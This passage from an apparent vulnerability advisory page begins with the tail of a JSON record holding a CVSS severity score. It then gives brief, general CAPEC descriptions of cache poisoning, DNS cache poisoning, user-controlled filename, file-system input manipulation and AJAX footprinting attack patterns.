"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
No mitigation information available for this CWE.
CAPEC-141: Cache Poisoning
An attacker exploits the functionality of cache technologies to cause specific data to be cached that aids the attackers' objectives. This describes any attack whereby an attacker places incorrect or harmful material in cache. The targeted cache can be an application's cache (e.g. a web browser cache) or a public cache (e.g. a DNS or ARP cache). Until the cache is refreshed, most applications or clients will treat the corrupted cache value as valid. This can lead to a wide range of exploits including redirecting web browsers towards sites that install malware and repeatedly incorrect calculations based on the incorrect value.
CAPEC-142: DNS Cache Poisoning
A domain name server translates a domain name (such as www.example.com) into an IP address that Internet hosts use to contact Internet resources. An adversary modifies a public DNS cache to cause certain names to resolve to incorrect addresses that the adversary specifies. The result is that client applications that rely upon the targeted cache for domain name resolution will be directed not to the actual address of the specified domain name but to some other address. Adversaries can use this to herd clients to sites that install malware on the victim's computer or to masquerade as part of a Pharming attack.
CAPEC-73: User-Controlled Filename
An attack of this type involves an adversary inserting malicious characters (such as a XSS redirection) into a filename, directly or indirectly that is then used by the target software to generate HTML text or other potentially executable content. Many websites rely on user-generated content and dynamically build resources like files, filenames, and URL links directly from user supplied data. In this attack pattern, the attacker uploads code that can execute in the client browser and/or redirect the client browser to a site that the attacker owns. All XSS attack payload variants can be used to pass and exploit these vulnerabilities.
CAPEC-76: Manipulating Web Input to File System Calls
An attacker manipulates inputs to the target software which the target software passes to file system calls in the OS. The goal is to gain access to, and perhaps modify, areas of the file system that the target software did not intend to be accessible.
CAPEC-85: AJAX Footprinting
This attack utilizes the frequent client-server roundtrips in Ajax conversation to scan a system. While Ajax does not open up new vulnerabilities per se, it does optimize them from an attacker point of view. A common first step for an attacker is to footprint the target environment to understand what attacks will work. Since footprinting relies on enumeration, the conversational pattern of rapid, multiple requests and responses that are typical in Ajax applications enable an attacker to look for many vulnerabilities, well-known ports, network locations and so on. The knowledge gained through Ajax fingerprinting can be used to support other attacks, such as XSS.